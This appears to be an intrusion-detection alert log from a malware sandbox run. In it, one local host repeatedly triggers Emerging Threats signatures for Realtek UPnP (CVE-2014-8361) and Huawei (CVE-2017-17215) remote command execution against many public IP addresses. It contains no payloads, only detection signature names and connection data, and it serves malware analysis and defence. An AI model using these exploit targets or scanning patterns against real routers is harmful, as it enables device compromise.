                                                07/20/24-23:05:38.013524TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614686852869192.168.2.1480.50.203.132
                                                07/20/24-23:05:52.544972TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26022252869192.168.2.14162.169.7.175
                                                07/20/24-23:05:36.324298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3744037215192.168.2.14134.116.59.179
                                                07/20/24-23:05:33.829338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4780637215192.168.2.14157.183.5.146
                                                07/20/24-23:05:39.130228TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3303052869192.168.2.1434.187.124.168
                                                07/20/24-23:05:45.392755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5737637215192.168.2.1444.79.69.26
                                                07/20/24-23:05:50.533759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3750237215192.168.2.14189.78.163.147
                                                07/20/24-23:06:05.313786TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24910452869192.168.2.14126.250.149.64
                                                07/20/24-23:05:57.702462TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616048252869192.168.2.14102.108.27.28
                                                07/20/24-23:06:05.636118TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23358052869192.168.2.14136.96.92.41
                                                07/20/24-23:05:57.568828TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614229252869192.168.2.1451.139.183.142
                                                07/20/24-23:06:01.275898TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3527452869192.168.2.1427.99.183.157
                                                07/20/24-23:05:42.180899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5327037215192.168.2.1441.71.69.6
                                                07/20/24-23:05:39.055908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5282237215192.168.2.1434.67.137.40
                                                07/20/24-23:05:52.687825TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24566452869192.168.2.14161.199.46.212
                                                07/20/24-23:05:38.945198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3335237215192.168.2.14197.82.121.221
                                                07/20/24-23:05:34.644841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6045437215192.168.2.141.160.229.40
                                                07/20/24-23:05:36.328888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3287437215192.168.2.1441.186.116.94
                                                07/20/24-23:06:01.801044TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613501452869192.168.2.1488.157.23.181
                                                07/20/24-23:06:01.813206TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615964052869192.168.2.14107.203.244.180
                                                07/20/24-23:05:40.355766TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25779252869192.168.2.14166.95.201.236
                                                07/20/24-23:05:34.662338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5689637215192.168.2.1447.121.106.191
                                                07/20/24-23:06:34.953106TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613792852869192.168.2.1461.217.120.125
                                                07/20/24-23:05:35.329971TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614544652869192.168.2.14211.173.154.125
                                                07/20/24-23:07:36.969912TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23579252869192.168.2.1478.18.150.141
                                                07/20/24-23:05:56.227686TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614232452869192.168.2.14151.37.89.93
                                                07/20/24-23:06:15.773602TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5786252869192.168.2.1451.62.238.64
                                                07/20/24-23:05:34.659618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4740837215192.168.2.14109.251.14.201
                                                07/20/24-23:05:59.433517TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4897252869192.168.2.14152.185.122.165
                                                07/20/24-23:06:03.367262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4346037215192.168.2.14157.0.230.10
                                                07/20/24-23:06:13.793654TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614397452869192.168.2.14101.76.45.188
                                                07/20/24-23:06:19.714340TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616019452869192.168.2.14154.75.87.243
                                                07/20/24-23:05:35.201174TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613775052869192.168.2.1468.251.134.43
                                                07/20/24-23:06:14.916755TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4039452869192.168.2.1479.60.37.198
                                                07/20/24-23:05:35.280581TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4714252869192.168.2.14153.104.11.80
                                                07/20/24-23:05:57.001261TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3314452869192.168.2.14180.234.239.68
                                                07/20/24-23:06:06.299139TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3889852869192.168.2.1486.158.137.16
                                                07/20/24-23:06:12.350524TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613776452869192.168.2.14126.96.154.165
                                                07/20/24-23:05:57.001261TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5798652869192.168.2.14178.246.89.184
                                                07/20/24-23:05:57.939285TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5905652869192.168.2.14213.166.217.247
                                                07/20/24-23:06:27.889934TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3433452869192.168.2.14196.52.240.32
                                                07/20/24-23:06:15.418646TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23672052869192.168.2.1474.205.40.173
                                                07/20/24-23:05:33.853184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4642837215192.168.2.1441.70.140.218
                                                07/20/24-23:05:36.532921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4002037215192.168.2.14107.101.21.133
                                                07/20/24-23:05:58.198496TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25142052869192.168.2.1469.41.19.44
                                                07/20/24-23:05:42.131789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5642637215192.168.2.1441.144.9.179
                                                07/20/24-23:05:52.692606TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24608052869192.168.2.1466.147.118.218
                                                07/20/24-23:05:56.997704TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613339052869192.168.2.14221.233.85.98
                                                07/20/24-23:05:39.039093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4245837215192.168.2.1441.213.86.222
                                                07/20/24-23:05:58.242242TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4782452869192.168.2.14194.186.6.67
                                                07/20/24-23:05:39.678174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4877437215192.168.2.1441.114.140.124
                                                07/20/24-23:05:57.211571TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615726252869192.168.2.14139.91.195.69
                                                07/20/24-23:06:08.903735TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614643052869192.168.2.1471.152.254.101
                                                07/20/24-23:05:36.327823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4708437215192.168.2.14197.158.187.122
                                                07/20/24-23:06:19.865859TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613333452869192.168.2.14147.144.124.143
                                                07/20/24-23:05:58.165543TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24819252869192.168.2.14212.119.81.31
                                                07/20/24-23:07:02.655349TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3621852869192.168.2.1495.214.15.233
                                                07/20/24-23:05:58.818180TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614779452869192.168.2.14126.250.149.64
                                                07/20/24-23:06:10.391415TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615160452869192.168.2.1413.31.100.161
                                                07/20/24-23:05:35.819768TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615937452869192.168.2.14106.140.193.219
                                                07/20/24-23:05:57.173548TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3620652869192.168.2.14197.17.84.0
                                                07/20/24-23:05:33.855567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6021837215192.168.2.14197.207.102.189
                                                07/20/24-23:06:09.588800TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614717252869192.168.2.1472.69.142.196
                                                07/20/24-23:05:52.633204TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5262252869192.168.2.1434.107.33.161
                                                07/20/24-23:05:40.339812TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4736452869192.168.2.1438.103.25.108
                                                07/20/24-23:06:03.150031TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3784052869192.168.2.14154.14.187.144
                                                07/20/24-23:05:39.543463TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5072252869192.168.2.14223.83.31.67
                                                07/20/24-23:05:46.113321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4872437215192.168.2.14157.89.20.175
                                                07/20/24-23:06:17.539924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5102437215192.168.2.1488.241.207.125
                                                07/20/24-23:05:35.454256TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615107452869192.168.2.14149.79.37.237
                                                07/20/24-23:05:56.048573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5787837215192.168.2.14197.205.42.41
                                                07/20/24-23:05:59.674473TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3966452869192.168.2.1424.224.16.219
                                                07/20/24-23:05:45.359662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6033037215192.168.2.1441.46.7.160
                                                07/20/24-23:06:06.828517TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5048252869192.168.2.1479.219.80.235
                                                07/20/24-23:06:08.201235TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3486052869192.168.2.14198.167.28.174
                                                07/20/24-23:05:59.221858TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3897652869192.168.2.14221.83.247.226
                                                07/20/24-23:05:52.633205TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25373852869192.168.2.14154.72.172.164
                                                07/20/24-23:05:37.475548TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5560452869192.168.2.14113.211.98.23
                                                07/20/24-23:05:59.377287TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4475852869192.168.2.1483.147.48.75
                                                07/20/24-23:05:52.507639TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26043052869192.168.2.14182.254.22.233
                                                07/20/24-23:06:15.148043TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3302452869192.168.2.14176.120.158.229
                                                07/20/24-23:05:57.544145TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25373052869192.168.2.1432.217.101.126
                                                07/20/24-23:05:59.128245TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24965052869192.168.2.1490.121.47.125
                                                07/20/24-23:06:13.733520TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3941852869192.168.2.1499.220.176.209
                                                07/20/24-23:06:01.876678TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3792252869192.168.2.14195.159.191.213
                                                07/20/24-23:05:59.057513TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4582852869192.168.2.14161.45.96.72
                                                07/20/24-23:05:35.238802TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5836052869192.168.2.14137.134.252.4
                                                07/20/24-23:05:35.744805TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5233252869192.168.2.14212.239.177.163
                                                07/20/24-23:06:05.732595TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4404252869192.168.2.14138.242.28.121
                                                07/20/24-23:05:59.106701TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615936852869192.168.2.1452.18.183.9
                                                07/20/24-23:07:25.713951TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4189252869192.168.2.14166.254.209.162
                                                07/20/24-23:05:58.981798TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5434052869192.168.2.1462.147.245.113
                                                07/20/24-23:06:01.903540TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23510252869192.168.2.1488.157.23.181
                                                07/20/24-23:05:58.797449TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23744052869192.168.2.1487.236.126.160
                                                07/20/24-23:05:58.195412TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613680852869192.168.2.14179.55.29.89
                                                07/20/24-23:05:35.804681TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615706852869192.168.2.14220.224.214.129
                                                07/20/24-23:05:52.502843TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5672652869192.168.2.14201.136.108.183
                                                07/20/24-23:05:40.369944TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25711652869192.168.2.14115.80.228.184
                                                07/20/24-23:06:09.741345TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615077252869192.168.2.14178.255.223.159
                                                07/20/24-23:05:57.438719TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4672852869192.168.2.14207.85.188.236
                                                07/20/24-23:06:13.609530TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4953052869192.168.2.14115.94.25.164
                                                07/20/24-23:05:38.003393TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4189452869192.168.2.1454.48.74.242
                                                07/20/24-23:06:01.918922TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4347652869192.168.2.14184.54.140.200
                                                07/20/24-23:05:38.437028TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615563652869192.168.2.14223.214.5.89
                                                07/20/24-23:05:39.047547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5662237215192.168.2.1438.164.85.139
                                                07/20/24-23:05:48.783693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3714637215192.168.2.14157.205.21.89
                                                07/20/24-23:05:52.483885TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5301252869192.168.2.1438.95.213.57
                                                07/20/24-23:05:52.537891TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25832852869192.168.2.14189.210.242.78
                                                07/20/24-23:05:58.369729TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23653252869192.168.2.14173.137.64.120
                                                07/20/24-23:06:24.686159TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3385452869192.168.2.14113.244.48.233
                                                07/20/24-23:06:00.927462TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4268252869192.168.2.14129.96.14.117
                                                07/20/24-23:06:06.184196TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5172252869192.168.2.14143.136.242.167
                                                07/20/24-23:05:47.709520TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615898852869192.168.2.14174.19.138.99
                                                07/20/24-23:06:08.356049TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4138452869192.168.2.1417.167.26.145
                                                07/20/24-23:05:57.587244TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3534652869192.168.2.1495.105.177.126
                                                07/20/24-23:05:59.260697TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5335852869192.168.2.14142.64.187.253
                                                07/20/24-23:05:56.361407TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3835052869192.168.2.14139.86.116.40
                                                07/20/24-23:05:35.556052TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615647652869192.168.2.14156.87.172.3
                                                07/20/24-23:05:59.204856TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5410652869192.168.2.1474.72.162.6
                                                07/20/24-23:05:37.556915TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23752252869192.168.2.14185.59.206.117
                                                07/20/24-23:05:58.240695TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3348052869192.168.2.14115.67.18.16
                                                07/20/24-23:05:58.913916TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25503852869192.168.2.1462.147.245.113
                                                07/20/24-23:07:07.817264TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24219652869192.168.2.1466.55.188.148
                                                07/20/24-23:05:40.413672TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24267652869192.168.2.1438.198.246.87
                                                07/20/24-23:06:16.939710TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614830452869192.168.2.14173.121.227.106
                                                07/20/24-23:05:45.383849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3531637215192.168.2.14189.221.175.63
                                                07/20/24-23:06:02.812092TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3457252869192.168.2.14139.133.137.186
                                                07/20/24-23:05:35.289186TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614479252869192.168.2.1459.10.142.189
                                                07/20/24-23:06:08.993749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4007837215192.168.2.14197.148.134.224
                                                07/20/24-23:05:45.460569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4137237215192.168.2.14197.75.75.225
                                                07/20/24-23:05:35.571697TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5941852869192.168.2.14153.91.158.250
                                                07/20/24-23:06:00.673228TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24943652869192.168.2.14110.201.72.125
                                                07/20/24-23:05:37.446803TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25005052869192.168.2.14125.97.107.120
                                                07/20/24-23:05:57.136226TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4115452869192.168.2.14183.154.100.223
                                                07/20/24-23:07:19.589495TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5382652869192.168.2.14199.195.114.2
                                                07/20/24-23:05:57.417957TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5522252869192.168.2.14222.37.53.103
                                                07/20/24-23:05:37.590968TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23509652869192.168.2.14136.195.130.35
                                                07/20/24-23:05:45.359662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5527637215192.168.2.1441.152.104.71
                                                07/20/24-23:05:47.012420TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5995652869192.168.2.14197.130.252.234
                                                07/20/24-23:06:01.464393TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5316052869192.168.2.1472.144.78.222
                                                07/20/24-23:06:02.517784TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5253852869192.168.2.14126.33.182.99
                                                07/20/24-23:05:39.496981TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5384052869192.168.2.1436.253.231.32
                                                07/20/24-23:06:10.507185TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24802852869192.168.2.1472.69.142.196
                                                07/20/24-23:05:46.565160TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614829252869192.168.2.1499.205.208.39
                                                07/20/24-23:06:01.482595TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23696652869192.168.2.14168.223.81.132
                                                07/20/24-23:05:50.533759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5501237215192.168.2.14197.185.254.0
                                                07/20/24-23:06:16.252148TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4231252869192.168.2.1424.18.34.232
                                                07/20/24-23:06:53.548834TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615118252869192.168.2.1482.229.75.23
                                                07/20/24-23:05:47.085193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6007237215192.168.2.144.210.141.89
                                                07/20/24-23:05:38.801468TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614447652869192.168.2.14108.67.27.88
                                                07/20/24-23:05:59.166678TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23586852869192.168.2.14115.195.128.65
                                                07/20/24-23:06:53.291407TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615692252869192.168.2.1471.172.2.131
                                                07/20/24-23:06:50.028546TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23539052869192.168.2.1497.21.167.55
                                                07/20/24-23:05:37.474845TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4279652869192.168.2.14112.153.191.145
                                                07/20/24-23:06:01.239423TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613670452869192.168.2.1468.116.156.72
                                                07/20/24-23:06:03.159646TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613311652869192.168.2.141.109.211.216
                                                07/20/24-23:05:44.227636TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25874852869192.168.2.1461.189.27.68
                                                07/20/24-23:06:04.232547TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26044652869192.168.2.1447.0.16.112
                                                07/20/24-23:05:57.437168TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25582652869192.168.2.144.91.9.190
                                                07/20/24-23:06:01.093345TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615303252869192.168.2.1459.108.150.126
                                                07/20/24-23:06:29.960598TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24494652869192.168.2.14133.103.255.70
                                                07/20/24-23:05:59.805275TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615595852869192.168.2.14159.239.108.10
                                                07/20/24-23:05:50.571555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4056437215192.168.2.14197.116.162.204
                                                07/20/24-23:06:23.248398TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614606852869192.168.2.1444.44.140.237
                                                07/20/24-23:06:45.997240TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613689652869192.168.2.1491.117.19.22
                                                07/20/24-23:05:56.086216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3524037215192.168.2.14197.182.242.250
                                                07/20/24-23:05:46.135626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6009037215192.168.2.1441.203.192.174
                                                07/20/24-23:05:38.614636TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3805252869192.168.2.1487.25.55.60
                                                07/20/24-23:05:45.460569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5127437215192.168.2.14157.117.255.125
                                                07/20/24-23:05:57.526744TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5273052869192.168.2.1413.101.20.178
                                                07/20/24-23:05:52.466707TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25082852869192.168.2.1462.30.160.191
                                                07/20/24-23:06:55.239442TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3450652869192.168.2.1497.21.167.55
                                                07/20/24-23:05:33.830570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4685037215192.168.2.14157.22.107.208
                                                07/20/24-23:05:38.945198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5981837215192.168.2.1497.169.240.164
                                                07/20/24-23:05:34.625708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4115437215192.168.2.14197.219.167.144
                                                07/20/24-23:06:24.435855TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616065252869192.168.2.1412.93.26.215
                                                07/20/24-23:05:33.855567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5454237215192.168.2.1441.103.45.78
                                                07/20/24-23:05:47.103906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4856437215192.168.2.14157.71.94.79
